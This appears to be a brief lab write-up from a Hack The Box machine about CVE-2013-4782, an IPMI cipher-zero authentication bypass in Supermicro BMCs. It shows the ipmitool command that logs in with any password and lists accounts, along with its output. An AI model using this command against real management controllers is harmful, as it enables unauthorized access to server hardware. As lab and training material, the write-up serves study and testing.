CVE-2013-4782
a vulnerability classified as very critical has been found in supermicro bmc (the affected version unknown). This affects an unknown function. The manipulation with an unknown input leads to a improper authentication vulnerability. CWE is classifying the issue as CWE-287. When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. This is going to have an impact on confidentiality, integrity, and availability
Exploit
┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ ipmitool -I lanplus -C 0 -H $IP -U Administrator -P blahblahblah user list
IANA PEN registry open failed: No such file or directory
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 true false false USER
2 Administrator true false true USER
3 true false false Unknown (0x00)
[...REDACTED...]
SIGN INT: Close Interface IPMI v2.0 RMCP+ LAN InterfaceIt can be easily done via the -C flag with the argument 0 using ipmitool
The Administrator user is present at the id, 2